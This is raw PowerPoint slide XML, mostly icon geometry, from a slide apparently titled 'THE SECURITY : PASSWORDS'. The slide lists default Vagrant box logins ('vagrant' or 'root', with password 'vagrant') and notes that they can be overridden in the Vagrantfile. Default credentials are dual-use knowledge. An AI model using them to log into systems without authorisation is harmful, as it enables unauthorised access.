                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>PASSWORDS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37963" y="1383663"/>
            <a:ext cx="696595" cy="722630"/>
            <a:chOff x="737963" y="1383663"/>
            <a:chExt cx="696595" cy="722630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="741908" y="1549082"/>
              <a:ext cx="689610" cy="553720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="230146" y="312737"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="185379" y="551065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329440" y="320268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230146" y="312737"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="364157" y="322554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="503193" y="553580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456148" y="322554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364157" y="322554"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="361642" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="361642" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483323" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446092" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689444" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448607" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361642" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="327629" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327629" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205953" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243119" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240842" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327629" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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3344" y="1858753"/>
              <a:ext cx="150138" cy="2444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067" y="1868570"/>
              <a:ext cx="145166" cy="23715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617" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328294" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121677" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84509" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327859" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86965" y="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9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02617" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328294" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121677" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84509" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327859" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86965" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="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1029" y="1549082"/>
              <a:ext cx="327660" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="327659" h="288289">
                  <a:moveTo>
                    <a:pt x="327576" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="240610" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243126" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205893" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327576" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327576" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="249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1029" y="1549082"/>
              <a:ext cx="327660" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="327659" h="288289">
                  <a:moveTo>
                    <a:pt x="327576" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327576" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205893" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243126" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240610" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327576" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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9015" y="1383663"/>
              <a:ext cx="143349" cy="1431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92734" y="2105673"/>
            <a:ext cx="164973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32790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-185" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Username:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:endParaRPr sz="11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  <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="732790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Password:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="498441"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(optional)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05380" y="968629"/>
            <a:ext cx="0" cy="1546860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1546860">
                <a:moveTo>
                  <a:pt x="0" y="154660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172695" y="1268648"/>
            <a:ext cx="696595" cy="837565"/>
            <a:chOff x="3172695" y="1268648"/>
            <a:chExt cx="696595" cy="837565"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3362020" y="1549082"/>
              <a:ext cx="504190" cy="553720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="504189" h="553719">
                  <a:moveTo>
                    <a:pt x="44767" y="312737"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="551065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144068" y="320268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44767" y="312737"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="504189" h="553719">
                  <a:moveTo>
                    <a:pt x="178777" y="322554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="317804" y="553580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270764" y="322554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178777" y="322554"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="504189" h="553719">
                  <a:moveTo>
                    <a:pt x="176263" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176263" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297942" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260718" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504063" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263220" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176263" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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58077" y="1858753"/>
              <a:ext cx="150137" cy="2444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6792" y="1868570"/>
              <a:ext cx="145172" cy="23715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37343" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121678" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84518" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327863" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86969" y="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9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37343" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121678" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84518" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327863" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86969" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="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75762" y="1549082"/>
              <a:ext cx="327660" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="327660" h="288289">
                  <a:moveTo>
                    <a:pt x="327571" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="240601" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205892" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327571" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327571" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="249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75762" y="1549082"/>
              <a:ext cx="327660" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="327660" h="288289">
                  <a:moveTo>
                    <a:pt x="327571" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327571" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205892" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240601" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327571" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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63047" y="1438768"/>
              <a:ext cx="143348" cy="8707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56439" y="1268648"/>
              <a:ext cx="165733" cy="14832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727451" y="2105673"/>
            <a:ext cx="164973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32790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-185" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Username:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:endParaRPr sz="11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  <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="732790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Password:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="498441"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(optional)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8586" y="2707817"/>
            <a:ext cx="4244975" cy="4406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900" spc="-125" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Tip: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>usernames </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>always </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>overwritten using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant.ssh.username </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant.ssh.password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Custom usernames </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>typically </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>defined </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Vagrantile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-155" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-25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5" dirty="0"/>
              <a:t>42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17" y="190436"/>
            <a:ext cx="18465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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-275" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>PASSWORDS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37963" y="1383663"/>
            <a:ext cx="696595" cy="722630"/>
            <a:chOff x="737963" y="1383663"/>
            <a:chExt cx="696595" cy="722630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="741908" y="1549082"/>
              <a:ext cx="689610" cy="553720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="230146" y="312737"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="185379" y="551065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329440" y="320268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230146" y="312737"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="364157" y="322554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="503193" y="553580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456148" y="322554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364157" y="322554"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="361642" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="361642" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483323" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446092" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689444" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448607" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361642" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="689610" h="553719">
                  <a:moveTo>
                    <a:pt x="327629" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327629" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205953" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243119" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240842" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327629" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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3344" y="1858753"/>
              <a:ext cx="150138" cy="2444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067" y="1868570"/>
              <a:ext cx="145166" cy="23715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617" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328294" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121677" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84509" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327859" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86965" y="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9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02617" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328294" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121677" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84509" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327859" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86965" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="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1029" y="1549082"/>
              <a:ext cx="327660" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="327659" h="288289">
                  <a:moveTo>
                    <a:pt x="327576" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="240610" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243126" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205893" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327576" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327576" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="249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1029" y="1549082"/>
              <a:ext cx="327660" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="327659" h="288289">
                  <a:moveTo>
                    <a:pt x="327576" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327576" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205893" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243126" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240610" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327576" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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9015" y="1383663"/>
              <a:ext cx="143349" cy="1431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92734" y="2105673"/>
            <a:ext cx="164973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32790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-185" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Username:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
